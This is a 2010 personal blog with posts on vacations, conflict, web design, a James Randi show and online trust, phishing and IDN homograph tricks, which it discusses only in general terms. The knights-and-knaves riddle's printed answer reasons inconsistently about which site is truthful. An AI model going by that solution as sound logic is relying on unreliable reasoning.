Posted 2010-07-13 by Erik Zalitis, changed 2010-07-13 by Erik Zalitis
(2010-07-05) The dreaded vacuum of vacation
So finally vacation is upon me. I just can't sit at home. Have to see things and do stuff. Have to travel and have to experience. Or do I?What's wrong in this picture? I'll say it's the two little words "Have" and "to" in that order. Vacation is supposed to be a time of no stress and no duties, right? Still you "have to" do things. So people stuff their dear ones into a crammed car and drive somewhere. Anywhere but here. Then they try to force happiness onto themselves because you gotta be happy damn it. Guess how it turns out?
If you run away from something, you're a fugitive, not someone about to arrive somewhere. So far I've spent time drinking beer with my friends, organized my CD-collection, written some php-code, spent time with my friends, watched a lot of Futurama and slept a lot. It feels good and I haven't traveled anywhere special. I will travel if I want to and not because I "should". I hope you have a great vacation, and get to use it to do whatever you and your family wants to. Relax!
Tags: Philosophy, musings
Posted 2010-07-05 by Erik Zalitis, changed 2010-07-05 by Erik Zalitis
(2010-06-25) When conflicts become permanent
There's an old saying here in Sweden (Although it may not be Swedish) that goes "Det inte ens fel när två träter". In English it goes something like "It's not one person's fault when two fights".My hard learned lesson is that all conflicts calls for confrontation. If that does not happen, the conflict eventually gets frozen. It may be painful to go through talking with the person or persons involved in it whether or not you're a part of the conflict or not.
But failing to do so often ends in a perennial state of animosity between the parts. When you confront someone, both you and they will setup heavy defenses. The first reaction of someone that is accused of something is to find excuses, fling accusations back to the accuser or come with their own accusations. There's nothing wrong with that reaction in itself, since it's a very hard thing to go through. And they may actually be right, don't forget that! If the confronting party comes through as wanting a solution while showing no signs of stubborn pride or a condescending tone, there's hope of a good resolution.
The only non-solution is never to confront. So many horrible excuses exist for this. The most common is "It's not possible to argue with him/her/them". This is the biggest pile of bullshit taking the form of spoken word ever! Whoever says something like that does not dare to go through the confrontation, wants someone else to do it for them or stands to gain something from the conflict itself.
I am poor with confrontations myself, like most people. So these are words of wisdom to myself just as much as for others. But believe me, they are words of wisdom.
Tags: Psychology, ethics
Posted 2010-06-25 by Erik Zalitis, changed 2010-06-25 by Erik Zalitis
(2010-06-19) Website design, compliance and optimization
I consider myself a pretty decent script-writer. The authoring system for this web site is something I've created. It's pretty rudimentary but works. But the graphical design is something I'm just not very good at. So far all my sites have had a rather "creative" look, where "creative" is an euphemism for amateurish. Eventually I caved in a started looking for premade designs.
A friend of mine pointed me at "Artisteer 2", a commercial program that allows you to create good looking websites. One man's "good looking site" is another man's "drab cookie-cutter designed site". So what?
Web site design is like clothing: if you dress badly, people will not judge you by your character, but by your clothes. Or rather: you have to be rather obnoxious for people to miss how you dress. If you dress normally, you will be judged by who you are. That may be a stretch, but work with me here folks. And that's how far the metaphor goes without breaking. If you dress sharply, people might be inclined to get a better first impression of you. This is not true for websites! When was the last time you even noticed a site because of its beautiful design? 1999? If so, wasn't it because most other sites looked like a ransom note done by a drunken chimpanzee?
Really, as the web has matured, compliance and optimization are the key word here. At least that's how I see things. Compliance is about making the web sites function well for all devices and browsers out there. PC and MAC may be the least of our worries as people surf the web through cell phones, TVs and gaming consoles. Optimization is an even bigger challenge. This site functions on Windows, Mac and Linux. It plays nice with Internet Explorer and Firefox as far as I've tested. It looks all right on my HTC Desire. That's due to the site being compliant enough. But optimization means serving different layouts to different devices.
If I choose to strip out the menu and headers when someone with a Smart Phone loads the page, they won't have to zoom in to read the text. Alas, this site won't do that. I hope to get around to implement such a function in the future. I do have a plan to implement RSS-feeds, which will allow the site to function on my Sony Bravia TV and many other devices. This is optimization and its the other important thing in design.
Because I don't know when to stop, here's the third thing: navigation. Unless you're interested in the site or the information you're getting, you have little desire to navigate. If it isn't on the front page it will most likely not be found unless you come in from a search result.
So to wrap it up: I believe focusing on amazing graphical design and trying to make it look "cool" is overrated as well as 10 years too late. Instead focus on making it available to everyone and letting them have everything instantly accessible.
Tags: Web site design
Posted 2010-06-19 by Erik Zalitis, changed 2010-06-19 by Erik Zalitis
(2010-06-17) The always amazing Randi
I live in Sweden, so I will have to travel far to meet people like James Randi. That is unless they decide to go on a tour and visit Sweden, which fortunately mr Randi did. So on the 15th of June 2010 I went to see his appearance at the Oskar Klein Auditorium which is located on the premises of the Royal Institute of Technology here in Stockholm.
The event was organized by the Swedish skeptics organisation "Vetenskap och Folkbildning". As one of their members I must say I'm impressed that they got the legendary illusionist and paranormal debunker to come to Stockholm. I wasn't as impressed on how the handled the logistics. Many of us barely got a ticket and they had to cram the auditorium to allow everyone entrance. But it's a minor complaint.
What makes a magician "magic" ? I won't go into detail, because it would be spoiling all the fun. But he used the first five minutes of the show to demonstrate that things are not what they appear to be using among other things a beard-trimmer. The lesson is simple: we all assume things about what we see. A good illusionist knows exactly what his or her audience believe that they see and use this against them.
Randi is not here just to entertain. He started the "James Randi Educational Foundation" which goal "(...) is to promote critical thinking by reaching out to the public and media with reliable information about paranormal and supernatural ideas so widespread in our society today". They're most famous for their $1 million challenge. The first person who can prove their psychic or paranormal abilities, gets the money. So far none has ever succeeded. It's not from the lack of trying if you believe mr Randi.
He went on to demonstrate why there can be a serious problems with things like new age medicine or psychic healing and their unverifiable claims. A number of years ago he managed to uncover a scam where a TV-evangelist used a wireless earpiece and some social trickery to fool people that he could heal them through god. Off course he charged them for it and most likely caused people not to seek proper medical attention. This could prove to be fatal.
The most valuable lessons from the whole event was when Randi reminded us that "people that get fooled are not stupid, just uninformed" and when he explained why you cannot prove a negative. "I can prove you that I'm not a giraffe but I cannot prove that there are no unicorns in Africa".
His explanations were blended with video clips from his career and sprinkled with many interesting anecdotes. Everything was delivered with a subtle, bit dry and very charming humor that made me laugh and think at the same time. He also made a lot of fun of people carrying the title Doctor of Philosophy. I may read too much into it, but I can't help suspecting that he feels a that he is in a weak position since he himself lacks an academic title. Projection, anyone?
Still he was both funny and dead serious at the same time and kept my undivided attention for the whole two hours the show lasted. I walked home feeling that I've encountered a true showman with the heart in the right place and the brains to match.
James Randi gets a full score from me (5/5). If he comes to your town or your country, I highly recommend that you get a ticket!
Tags: James Randi, skeptics, Vetenskap och folkbildning
Posted 2010-06-17 by Erik Zalitis, changed 2010-06-18 by Erik Zalitis
(2010-06-17) Am I evil? Or why evil people won't say yes
There's an old riddle that I've heard told in many different ways. Here's my version:"Assume you're surfing to three web sites and want to know which you can trust. You’ve been told that Good sites have a banner certifying them as malware free. They will never spread malware and everything they say is true. Bad sites always spread malware and will never have a banner stating otherwise. They always lie. And then there are sites that may or may not have a banner and may or may not spread malware. They randomly lie and and tell the truth.
Of those three sites one site will always say the truth, one will always lie and one will be truthful or lying depending on who's controlling it.
Site 1 has a banner stating "This site is always malware free"
Site 2 states has no banner but states that "Site 1 is indeed always malware free"
Site 3 states "you may be attacked by me or maybe I'm malware free."
Which is which?"
(The answer is in the bottom of the post)
If only life was this simple. But it’s not like I’m making this up. There are plenty of banners certifying sites as safe, secure, family safe or whatever. There are lot’s of sites out there making no claims of being either and then off course sites saying that we take no responsibility for what people publish here. Then there are sites claiming things about other sites. So, the old knights and knaves riddle is not totally wrong as a metaphor. The problem is: which is which? That is a riddle that cannot be solved so easily.
The solution that works best is the “web of trust”-model. You do it all the day. When you hear about a new brand, you ask your friends if it’s any good. You may buy a magazine, whose reviewers you trust. Maybe you buy some of the new brand’s cheaper products just to see if it’s good without spending cash on a risk. Your gut-feeling can tell you about it.
On the Internet it’s harder, but not by any means impossible. Links from a site you trust will probably not point to untrustworthy sites. But what about links from those sites? For every jump away from the centre of trust, the risk increases. Brand recognition can help you. Tieto is trustworthy, so tieto.com should be fine. But if you get an email from an unknown source, telling you to go to the new patch site for Tieto servers which is located at pathes-tieto.trust-me.nu, you will probably be a bit more skeptical.
For every day that passes, bad guys find new ways to abuse trust. The whole idea of phishing is based on the fact that you can look trustworthy by looking like someone everyone trusts. Wolves in sheep-skins do exist outside the story books, I’m afraid.
Then there are even more insidious ways to abuse trust. Links encoded to look like they point to a site but really goes somewhere else. And someone figured out a way to abuse UTF in IDN-domain names by using an obscure letter that looked like an “A” and then registering domain names with well known brand names where the a was replaced with … that’s right … the obscure letter. So a user surfing to citibank.com may still get tricked.
And the list goes on and on. The attacks often targets weaknesses in software, but as patches and better security designs comes along, the human behind the key board becomes a more useful target.
The only way we can solve this is to apply skepticism and thinking about how to validate trust. In a perfect world, white listing everything would make everything better. That is, only allow people to do what is deemed safe. This cannot be done here, as it’s against the nature of the Internet. Doing it on the users’ computers can work, but users will complain about the annoying “do you want this program to access the internet” prompts. Bruce Schneier recently wrote an article about it. 2) I like it, because he writes what I’ve thought about for many years: is blacklisting (like Antivirus software does) still a good solution? Still the world is not perfect, so we have to decide how to decrease our own risk and how to act to protect others.
But to wrap it up: I’m pretty sure about one thing, censoring the Internet or putting up block lists is a poor solution. Prosecution of hackers, spammers and other “cyber-criminals” is probably better spent money. We cannot protect people from themselves, but we can teach them a more secure behavior when they’re surfing. Teach a man how to fish (and how not to get phished) and all of that, you know.
Answer to the riddle
Site 3 cannot always be malware free because it says it can have malware sometimes. It can't be truthful, since it's claiming to be random. A truthful system would never do that.
Site 2 cannot be malware free because it claims that another site is malware free. If it were truthful, then both site 1 and 2 would be truthful. If it was lying then both site 1 and 2 would be lying.
Site 1 is therefore malware free.
Which site is bad and which is random?
Site 2 is actually saying something that is true, so it must be the site randomly lying and randomly telling the truth. This leaves site 3 as the liar.
http://sites.google.com/site/newheiser/knightsandknaves
1) http://en.wikipedia.org/wiki/IDN_homograph_attack
The unicode way to bypass spam filters:
http://nedbatchelder.com/blog/200504/phishing_fun_with_unicode.html
2) Cryptogram for November 2009, “Is Antivirus dead?”
http://www.schneier.com/crypto-gram-0911.html#10
Tags: Ethics
Posted 2010-06-17 by Erik Zalitis, changed 2010-06-17 by Erik Zalitis